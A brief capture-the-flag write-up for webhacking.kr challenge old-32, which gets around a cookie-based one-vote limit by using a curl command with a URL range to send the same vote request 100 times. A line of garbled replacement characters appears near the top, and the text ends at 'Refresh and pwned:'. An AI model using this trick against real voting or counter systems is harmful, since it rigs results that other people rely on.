old-32 -- Session (Cookie Abuse)

URL: https://webhacking.kr/challenge/code-5/

��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������

It seems like you can only vote once for user and you need to get 100 points for flag

<tr onmouseover=this.style.background='gray' onmouseout=this.style.background='black' onclick=location.href='?hit=surinqer333'>
    <td>1492</td>
    <td>surinqer333
    <td align=center>1 / 100</td>
</td></tr>

If we click on someone we get cookie, this prevents us from voting again.

➜ curl 'https://webhacking.kr/challenge/code-5/?hit=rasosa7682&repeat=[1-100]' -b 'PHPSESSID=3052403292'
...
<head>
<title>Challenge 32</title>
</head>
<body bgcolor=black text="white">
<br><br>
<table border=0 align=center>
<tr align=center><td>RANK</td><td>NAME</td><td colspan=2 align=center>&nbsp;&nbsp;Hit</td></tr>
<tr><td colspan=5><hr></td></tr>
<meta http-equiv=refresh content=0;url=./>

Note: repeat param is only for curl, so it can be sent 100 times. Just a neat curl trick.

Refresh and pwned: